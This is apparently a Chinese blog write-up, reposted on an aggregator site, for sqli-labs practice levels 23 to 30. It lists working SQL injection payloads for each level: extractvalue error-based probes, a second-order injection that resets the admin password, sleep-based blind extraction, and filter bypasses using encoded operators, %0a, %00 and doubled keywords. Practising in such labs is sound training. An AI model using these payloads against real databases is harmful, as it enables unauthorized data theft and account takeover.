sqli 靶场 Level23-Level30 wp

这篇具有很好参考价值的文章主要介绍了sqli 靶场 Level23-Level30 wp。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

level-23 (注释被过滤)
抓包

寻找注入点
● id=1’,id=1’',成周期性变化

POC
● POC: id=1’+and+extractValue(1,concat(0x7e,user()))–+’

结果:failed。怀疑–被过滤掉了,试试前后闭合方案

● POC: id=1’+and+extractValue(1,concat(0x7e,user()))+and+’

结果:ok。

level-24(二次注入)
这一关比较特殊,是用类admin的账号去修改admin的密码。
思路:
(1)我们注册一个admin’-- 、admin’#、admin’ and ‘1、admin’ or ‘1 的账号。这是第一次注入
(2)我们通过这个账号修改密码来修改隐藏的admin账户的密码。这是第二次注入
第一个’在这里是为了闭合前面的’
–后者#这里起到注释的效果
列出更改密码的sql更好理解:
username sql
admin’-- update table_x set pasword=‘123’ where username=‘admin’-- ’ and password=‘456;
admin’# update table_x set pasword=‘123’ where username=‘admin#’-- ’ and password=‘456;
admin’ and '1 update table_x set pasword=‘123’ where username=‘admin#’-- ’ and password=‘456;
admin’ or '1 update table_x set pasword=‘123’ where username=‘admin#’-- ’ or password='456;

  1. 注册账号

注意–后面是有空格,否则起不到注释的效果
2. 登录新账号修改密码(456)

  1. 验证(密码456)

==》 成功登录admin

level-25 (and、or被过滤)
抓包

寻找注入点
'‘存在
POC
● POC:id=-1’+or+extractValue(1,concat(0x73,user()))–+
发现and,or关键字被屏蔽了,还是不区分大小写的屏蔽

● 使用union

结果:成功注入

● 使用aandnd/anandd --> and

POC: id=-1’+aandnd+extractValue(1,concat(0x73,user()))–+

level-25a(and、or被过滤盲注)
抓包

寻找注入点
● POC:id=1’ and if(1,sleep(3),sleep(0))–+
==》不休眠
● POC:id=1" and if(1,sleep(3),sleep(0))–+
==》休眠
==》存在注入
POC
● step1: 猜字符串长度:POC: id=1+aandnd+if(length(user())=§1§,sleep(3),0)–+

==》14

● step2:猜每个字符: POC: id=1+aandnd+if(substr(user(),§1§,1)=‘§a§’,sleep(3),0)–+

==》root@localhost
level-26 (空格、注释被过滤)
抓包
查看正常请求和响应

寻找注入点
● 使用单双引号,发现输出周期性变化,存在注入
POC
试试union select
● POC: '+union+select+1,user(),3–+
==》 空格被过滤了

==》 因为空格被过滤了,所以and,union都使用不了,–+也使用不了
寻找其他替代方案:&&替代and,后’闭合替换–+
试试逻辑&

● POC: id=1’&extractvalue(1,concat(0x7e,user(),0x7e))&’ //字符串拼接&

==》 无反应

试试逻辑&&
● POC: id=1’&&extractvalue(1,concat(0x7e,user(),0x7e))&&’ //逻辑&&

试试&使用%编码
POC: id=1’%26extractvalue(1,concat(0x7e,user(),0x7e))%26’ //字符串拼接,&使用%编码

==》 成功爆出

试试&&使用%编码
POC: id=1’%26%26extractvalue(1,concat(0x7e,user(),0x7e))%26%26’ //&&使用%编码

==》 成功爆出

试试|
POC: id=1’|extractvalue(1,concat(0x7e,user(),0x7e))|’ //使用|

==》 成功爆出

试试||
POC: id=1’||extractvalue(1,concat(0x7e,user(),0x7e))||’ //使用||

==》 成功爆出
试试|使用%编码
POC: id=1’%7cextractvalue(1,concat(0x7e,user(),0x7e))%7c’ //|使用%编码

==》 成功爆出

试试||使用%编码

POC: id=1’%7c%7cextractvalue(1,concat(0x7e,user(),0x7e))%7c%7c’ //||使用%编码

==》 成功爆出

试试()代替空格
POC: 1’aandnd(extractvalue(1,concat(0x7e,user())))='1

==》 成功爆出

试试0a%

==>爆破失败,%0a也被过滤掉了

总结
● 空格被过滤了
○ 试试&,&&,|,||以及他们的%编码
○ 试试()
● 因为空格被过滤了,不能使用–+

level-26a (空格、注释被过滤,盲注)
抓包
同level-26
寻找注入点
同level-26
POC
因为没有回显,只能通过盲注爆破
● 获取字段的长度
POC: 1’%26%26if(1=1,length(user())=§1§,0)=0%26%26’1

==》14
● 爆破每个字符
POC: id=1’%26%26if(1=1,substring(user(),§1§,1)=‘§a§’,0)=0%26%26’1

==》root@localhost

level-27 (union select被过滤)
抓包

寻找注入点

==>存在
POC
● POC: 1’+%26%26+extractvalue(1,concat(0x7e,user(),0x7e))%26%26’
==> 过滤掉了空格
● POC: id=1’+union+select+1,2,3,4–+

==》 union select被过滤了

既然空格和union select都被过滤了,试试使用&&、&、||、|、()、%0a+报错函数+前后闭合这种方式

POC: id=1’|extractvalue(1,concat(0x7e,user(),0x7e))|’

==》成功爆破。

当然使用其他%26%26、%26、||,也是可以的

level-27a (union select被过滤,盲注)
抓包
同level27

寻找注入点
同level27

POC
同level27,不过加上了盲注,盲注可以参考26a。
● 求字符串长度

POC: 1"+and%0aif(length(user())=§1§,1,0)=“1
● 求每个字符
POC: 1”+and%0aif(substring(user(),§1§,1)=‘§a§’,1,0)="1

level-28 (过滤select、union)
抓包

注入点
● 1、1"回显正常 ,1’回显错误,存在单引号 字符型注入
● 2’%26%26’1’='1,回显为id=1,存在小括号

(2&&1=1)的结果是1,所以id不论怎么变都和id=1。若没有小括号,id等于几,回显多少关的数据

POC
● 爆破列数
id=1’)+order+by+10–+
因为有空格,所以–+不能使用
id=1’)%0aorder%0aby%0a10%26%26’1’=(‘1
语句错误
==》数据库列数爆破失败,回显位只能不断尝试。
● 爆破回显位
○ 测试过滤
id=1’)+union+select+1,2,3+or+‘1’=('1

==》空格被过滤了
==》 #被过滤了
==》–被过滤了
==》union select被过滤了
==》union空白字符select也被过滤了

● 尝试获取列数
id=1’)%0aorder%0aby%0a10;%00
order by利用二分法爆破
注:%00代表NULL,用来表示字符串的结束,相当于C中"/0",因为用不了注释,这里使用%00

==》爆出列数4

● 尝试%0a代替空格
id=0’)%0aunion%0aselect%0a1,2,3%0aor(‘1’='1

==》union%0aselect被过滤了

● 尝试构造union select
id=0’)%0aunionunion%0aselect%0aselect%0a1,2,3%0aor(‘1’='1

● 再回显位爆破username,database
id=0’)%0aunionunion%0aselect%0aselect%0a1,database(),3%0aor(‘1’='1

==> 爆破成功,user()虽然没爆破出来,我们可以利用第二个位置填入user,再试一次即可。
注:当然上面也可以使用;%00,即替换后面%0aor(‘1’='1
level-28a (过滤select、union,盲注)
抓包

寻找注入点
略,同level-28
POC
同level-28

当然你也可以尝试盲注

level-29 (waf保护)
前言:阻抗失衡一般用于解释。这一关要路径带入login.php,否则是没有WAP轻易爆破

抓包

寻找注入点

POC
level-30 (waf保护,盲注)
前言:同level-29,url路径带入login.php;
抓包

寻找注入点

POC文章来源地址https://www.toymoban.com/news/detail-740501.html

到了这里,关于sqli 靶场 Level23-Level30 wp的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 2023年春秋杯网络安全联赛 春季赛 wp

    第一部分求解一下pell函数得到x,y 直接使用二项式展开定理即可还原flag 可以直接将z表示出来然后就能求解key了 1day,一个SQL注入改管理员的密码。 payload: 然后计划任务执行读取flag或者反弹shell即可。 上来扫到了dowload目录,然后pyc反编译得到源码。 在numpy.loads存在pickle反序

    2024年02月13日
    浏览(42)
  • 网络安全常用靶场推荐

    sqli-labs sqli-labs包含了大多数的sql注入类型,以一种闯关模式,对于sql注入进行漏洞利用 下载地址:https://github.com/Audi-1/sqli-labs xss challenges xsschallenges是一个专对于XSS漏洞练习的在线靶场,包含了各种绕过,各种姿势的XSS利用 下载地址:XSS Challenges (by yamagata21) - Stage #1 xss-labs

    2024年02月12日
    浏览(45)
  • 2023年“羊城杯”网络安全大赛 Web方向题解wp 全

    团队名称:ZhangSan 序号:11 不得不说今年本科组打的是真激烈,初出茅庐的小后生没见过这场面QAQ~ 简单记录一下,实际做题踩坑很多,尝试很多。 先扫了个目录,扫出 start.sh 内容如下,这个其实和hint一样的,hint就不放了,尊嘟假嘟解密。 开始做题,题目让我访问路由 /

    2024年02月10日
    浏览(38)
  • 贵阳大数据及网络安全精英对抗赛-解题赛WP

    (没写几题,就记录一下,misc写的基本都是佬们打爆的几题,就不写了 (如果有佬出了rust的flag,求佬告诉我一下orz,太菜了,没运行出来,验证不了flag,麻烦佬们告诉下orz) 观察程序,其中有base64、rc4、DES算法, 函数主要逻辑:输入一串字符,前一位和后一位异或,再rc4加密

    2024年02月05日
    浏览(43)
  • 【安全学习】-网络安全靶场实训演练系统建设方案

    第1章需求分析 1.1建设需求 1.2建设目标与内容 第2章系统整体建设 2.1设计思想 2.2建设目标 2.3架构设计 2.4系统设计 2.4.1基础平台系统设计 2.4.2实训分系统设计 2.4.3考核分系统设计 2.4.4拓扑设计分系统设计 2.4.5模拟仿真系统设计 2.4.5.1网络仿真 2.4.5.2安全仿真 2.4.5.3系统监控 2.

    2024年02月03日
    浏览(42)
  • 第三届陕西省大学生网络安全技能部分WP

    题目代码如下: payload: http://e2e84684.clsadp.com/?PK=/flag 题目文本 8881088410842088810810842042108108821041010882108881 0为截断,0前面的4位置相加之后为26个大写英文字母的索引,exp如下: 使用kali中join工具爆破出zip密码 在key.jpg中 右键属性里面详细信息获得一串韩文加密 通过在线网站解密获

    2024年02月08日
    浏览(41)
  • LitCTF2023 郑州轻工业大学首届网络安全赛 WP 部分

    由于刚接触CTF没多久 还是属于萌新级别的(中专高中生)也没怎么打过比赛记录一下学习的过程大佬绕过即可,后续会继续加油努力。 NSSCTF平台:https://www.nssctf.cn/ PS:记得所有的 flag 都改为 NSSCTF或者LitCTF 我Flag呢? 奇怪,放哪里了,怎么看不见呢?(初级难度) 直接 F12

    2024年02月05日
    浏览(50)
  • <网络安全>《30 常用安全标准》

    o《信息安全技术 个人信息安全规范》(GB/T35273-2017) o《信息安全技术 个人信息去标识化指南》(GB/T37964-2019) o《信息安全技术 工业控制系统安全检查指南》(GB/T 37980-2019) o《信息安全技术 工业空制系统产品信息安全通用评估准则》(GB/T37962-2019) o《信息安全技术 工业控制系

    2024年02月20日
    浏览(42)
  • 16个网络安全常用的练习靶场(小白必备)

    DVWA是用PHP+Mysql编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序。包含了SQL注入、XSS、盲注等常见的一些安全漏洞。 链接地址:http://www.dvwa.co.uk mutillidaemutillidae是一个免费,开源的Web应用程序,提供专门被允许的安全测试和入侵的Web应用程序。它是由Adrian “Ironge

    2024年02月02日
    浏览(58)
  • 河南省第五届“金盾信安杯”网络与数据安全大赛-WP

    师傅们,我太菜了,除了最后一个小时都还在前20名,结果最后一个小时被踢下去了,做了一道少解的题目也掩饰溃败,被打服了,直接被踢出前40名,babyrsa到底怎么解,呜呜!被打服了!!!!!!!以下是我们队伍的10道题目的wp。 题目一 Crypto-我看看谁还不会RSA 操作内容: 看到该题之后发现是

    2024年02月04日
    浏览(41)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包